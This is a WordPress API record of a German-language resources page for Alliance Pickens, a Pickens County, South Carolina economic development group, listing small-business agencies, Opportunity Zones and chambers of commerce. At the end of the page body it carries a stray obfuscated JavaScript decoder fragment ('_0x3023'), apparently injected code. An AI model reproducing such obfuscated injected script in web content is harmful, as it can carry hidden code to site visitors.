{"id":6118,"date":"2020-10-28T14:30:06","date_gmt":"2020-10-28T14:30:06","guid":{"rendered":"http:\/\/alliancepickens.com\/verfuegbare-ressourcen\/"},"modified":"2020-12-04T20:13:56","modified_gmt":"2020-12-04T20:13:56","slug":"verfuegbare-ressourcen","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/","title":{"rendered":"Verf\u00fcgbare Ressourcen"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5108&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Pickens County-Ressourcen<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignright size-full wp-image-10714\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" alt=\"\" width=\"303\" height=\"357\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg 303w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge-255x300.jpg 255w\" sizes=\"auto, (max-width: 303px) 100vw, 303px\" \/>Unser Ziel bei Alliance Pickens ist es, Mitgliedern der bestehenden Branchengemeinschaft sowie Unternehmen, die mehr \u00fcber Pickens County erfahren m\u00f6chten, die Informationen zur Verf\u00fcgung zu stellen, die sie ben\u00f6tigen, um fundierte Gesch\u00e4ftsentscheidungen zu treffen. Wenn unser B\u00fcro bei der Expansion oder dem Umzug Ihres Unternehmens nach Pickens County.South Carolina.USA behilfle sein kann, kontaktieren Sie bitte <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=13653\">unser B\u00fcro.<\/a><\/p>\n<p>Die Economic Development Alliance of Pickens County (Alliance Pickens) wird von der Regierung des Pickens County unterst\u00fctzt und arbeitet eng mit ihr zusammen. Unternehmen k\u00f6nnen mit Pickens County \u00fcber Anreize verhandeln, und alle steuerbezogenen Richtlinien werden vom Pickens County oder dem Bundesstaat South Carolina bereitgestellt.<\/p>\n<p><span style=\"font-weight: 400\">Die Bezirksregierung von Pickens widmet sich der Bereitstellung zeitnaher, effizienter, h\u00f6flicher und professioneller Dienstleistungen f\u00fcr alle B\u00fcrger des Pickens County. Pickens County trifft Entscheidungen, die das Wohl der gr\u00f6\u00dferen Gemeinschaft f\u00f6rdern und die Ressourcen, Politiken, Pl\u00e4ne und Verfahren entwickeln, um den Bed\u00fcrfnissen der \u00d6ffentlichkeit wirksam gerecht zu werden. Beamte der Bezirksregierung verfolgen und unterst\u00fctzen programme und Projekte, die die Priorit\u00e4ten des Pickens County Council am besten einhalten.<\/span><\/p>\n<p><a class=\"greenbtn\" href=\"https:\/\/www.co.pickens.sc.us\" target=\"_blank\" rel=\"noopener noreferrer\">Weitere Informationen<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_class=&#8221;er&#8221; el_id=&#8221;entrepreneurial_resources&#8221;][vc_column][vc_column_text el_id=&#8221;er&#8221;]<\/p>\n<h2>Unternehmerische Ressourcen<\/h2>\n<p>Dank des gesch\u00e4ftsfreundlichen Umfelds von Pickens County.South Carolina.USA k\u00f6nnen Kleinunternehmer gedeihen. Bundes-, Landes- und lokale Ressourcen stehen zur Verf\u00fcgung, um die Bem\u00fchungen von Kleinunternehmern zu unterst\u00fctzen, egal ob Sie gerade Ihr Unternehmen gr\u00fcnden oder an einem Plan arbeiten, der ihm beim Wachstum hilft.[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6139\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sbdc.png\" alt=\"\" width=\"174\" height=\"66\"> <a href=\"https:\/\/www.scsbdc.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Weitere Informationen<\/a><\/p>\n<p>Im Rahmen einer Kooperationsvereinbarung mit der U.S. Small Business Administration wurde das Small Business Development Center (SC SBDC)-Programm eingerichtet, um Start-up-Unternehmen kleiner Unternehmen zu unterst\u00fctzen und das weitere Wachstum kleiner Unternehmen im ganzen Land zu unterst\u00fctzen. Das Programm wird mit Bundes-, Landes- und Privatmitteln unterst\u00fctzt und steht jedem gegenw\u00e4rtigen oder zuk\u00fcnftigen Kleinunternehmer in der Regel geb\u00fchrenfrei offen.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6154\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scdoc.png\" alt=\"\" width=\"193\" height=\"57\"> <a href=\"https:\/\/www.sccommerce.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Weitere Informationen<\/a><\/p>\n<p>Das SC Department of Commerce bietet eine Vielzahl oder Ressourcen f\u00fcr kleine Unternehmen enthalten ihre Business Resource Guide.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6167\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scbos.png\" alt=\"\" width=\"149\" height=\"50\"> <a href=\"https:\/\/scbos.sc.gov\/\">Weitere Informationen<\/a><\/p>\n<p>Das South Carolina Business One Stop oder SCBOS ist das offizielle Business-Webportal von South Carolina.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6182\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-smbcc.png\" alt=\"\" width=\"167\" height=\"61\"> <a href=\"http:\/\/osmba.sc.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">Weitere Informationen<\/a><\/p>\n<p>Ziel des Office of Small and Minority Business Assistance (OSMBA) ist es, das Wachstum und die Entwicklung kleiner und minderheitseigener Unternehmen in South Carolina zu f\u00f6rdern und daf\u00fcr zu eintreten, dass ein gerechter Teil der staatlichen Auftr\u00e4ge an kleine und in Minderheitsbesitz befindliche Unternehmen vergeben wird.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6195\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sba.png\" alt=\"\" width=\"97\" height=\"103\"> <a href=\"https:\/\/www.sba.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">Weitere Informationen<\/a><\/p>\n<p>Die U.S. Small Business Administration (SBA) wurde 1953 als unabh\u00e4ngige Agentur der Bundesregierung gegr\u00fcndet, um die Interessen kleiner Unternehmen zu unterst\u00fctzen, zu unterst\u00fctzen und zu sch\u00fctzen, um freie wettbewerbsf\u00e4hige Unternehmen zu erhalten und die Gesamtwirtschaft unserer Nation zu erhalten und zu st\u00e4rken.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4767&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;opportunity_zones&#8221;][vc_column][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5114\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg\" alt=\"\" width=\"482\" height=\"423\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg 482w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2-300x263.jpg 300w\" sizes=\"auto, (max-width: 482px) 100vw, 482px\" \/><\/a><\/p>\n<p><a class=\"downloads\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Jetzt herunterladen<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Opportunity-Zonen<\/h2>\n<p>[\/vc_column_text][vc_column_text]Der Opportunity Zone-Anreiz ist ein Community-Entwicklungsprogramm, das langfristige private Investitionen in einkommensschwachen Gemeinden f\u00f6rdern soll. Dieses Programm bietet einen steuerpflichtigen Anreiz des Bundes f\u00fcr Steuerzahler, die nicht realisierte Kapitalgewinne in &#8220;Opportunity Funds&#8221; reinvestieren, die spezialisierte Fahrzeuge sind, die sich f\u00fcr Investitionen in Gebiete eignen, die als &#8220;Chancenzone&#8221; bezeichnet werden. Im Pickens County wurden drei (3) Z\u00e4hlbezirke als Opportunity Zone ausgew\u00e4hlt.<\/p>\n<p>Weitere Informationen finden Sie im Pickens County <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><br \/>\n  <strong>Opportunity Zone Flyer<\/strong><br \/>\n<\/a><strong>.<\/strong><\/p>\n<p>Um lokale verf\u00fcgbare B\u00fcro- und Industrieimmobilien in opportunity Zone zu finden, besuchen Sie bitte unsere <a href=\"http:\/\/alliancepickens.com\/de\/standorte-gebaeude\/\">Seiten Sites &amp; Buildings<\/a> und suchen Sie nach dem Symbol &#8220;Opportunity Zone&#8221;.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_id=&#8221;chambers&#8221;][vc_column][vc_column_text]<\/p>\n<h2 style=\"text-align: center\">Handelskammern<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10360&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.clemsonareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.clemsonareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Clemson Area<\/strong><br \/>\nHandelskammer<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10353&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.easleychamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.easleychamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Greater Easley<\/strong><br \/>\nHandelskammer<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10346&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.explorepickens.com\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.explorepickens.com\/%22\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Greater Pickens<\/strong><br \/>\nHandelskammer<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10339&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/libertyareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/libertyareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Liberty Area<\/strong><br \/>\nHandelskammer<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Weitere Informationen zu verf\u00fcgbaren Ressourcen<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;23&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5108&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Pickens County-Ressourcen [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]Unser Ziel bei Alliance Pickens ist es, Mitgliedern der bestehenden Branchengemeinschaft sowie Unternehmen, die mehr \u00fcber Pickens County erfahren m\u00f6chten, die Informationen zur Verf\u00fcgung zu stellen, die sie ben\u00f6tigen, um fundierte Gesch\u00e4ftsentscheidungen zu treffen. Wenn unser&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6118","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Verf\u00fcgbare Ressourcen - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Verf\u00fcgbare Ressourcen - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5108&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Pickens County-Ressourcen [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]Unser Ziel bei Alliance Pickens ist es, Mitgliedern der bestehenden Branchengemeinschaft sowie Unternehmen, die mehr \u00fcber Pickens County erfahren m\u00f6chten, die Informationen zur Verf\u00fcgung zu stellen, die sie ben\u00f6tigen, um fundierte Gesch\u00e4ftsentscheidungen zu treffen. Wenn unser&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:56+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/\",\"name\":\"Verf\u00fcgbare Ressourcen - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"datePublished\":\"2020-10-28T14:30:06+00:00\",\"dateModified\":\"2020-12-04T20:13:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/verfuegbare-ressourcen\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Verf\u00fcgbare Ressourcen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Verf\u00fcgbare Ressourcen - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/","og_locale":"de_DE","og_type":"article","og_title":"Verf\u00fcgbare Ressourcen - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5108&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Pickens County-Ressourcen [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]Unser Ziel bei Alliance Pickens ist es, Mitgliedern der bestehenden Branchengemeinschaft sowie Unternehmen, die mehr \u00fcber Pickens County erfahren m\u00f6chten, die Informationen zur Verf\u00fcgung zu stellen, die sie ben\u00f6tigen, um fundierte Gesch\u00e4ftsentscheidungen zu treffen. Wenn unser&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:56+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/","url":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/","name":"Verf\u00fcgbare Ressourcen - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","datePublished":"2020-10-28T14:30:06+00:00","dateModified":"2020-12-04T20:13:56+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/verfuegbare-ressourcen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Verf\u00fcgbare Ressourcen"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6118"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6118\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}